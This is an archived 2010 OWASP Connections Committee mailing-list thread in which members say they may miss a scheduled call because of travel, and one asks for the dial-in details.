[OCC] Probably not going to make tonight's call

Jim Manico jim.manico at owasp.org
Tue Apr 20 14:53:29 EDT 2010


I am very sorry, I cannot be on the call today.

But if there is any OWASP news - please let me know - and I'll add it to 
the next podcast.

Cheers!
- Jim

> I am stuck in Amsterdam but I hope to do the call.
> Can you resend me the number & password?
>
>
> On 20 April 2010 13:55, Justin Clarke <justin.clarke at owasp.org> wrote:
>
>     as I will be (finally!) heading back to the UK (fingers crossed my
>     train isn't cancelled)
>
>     Justin
>
>     _______________________________________________
>     Owasp-connections-committee mailing list
>     Owasp-connections-committee at lists.owasp.org
>     https://lists.owasp.org/mailman/listinfo/owasp-connections-committee
>
>
>
>
> -- 
> Eoin Keary
> OWASP Global Board Member
> OWASP Code Review Guide Lead Author
>
> http://asg.ie/
> https://twitter.com/EoinKeary


-- 
Jim Manico
OWASP Podcast Host/Producer
OWASP ESAPI Project Manager
http://www.manico.net
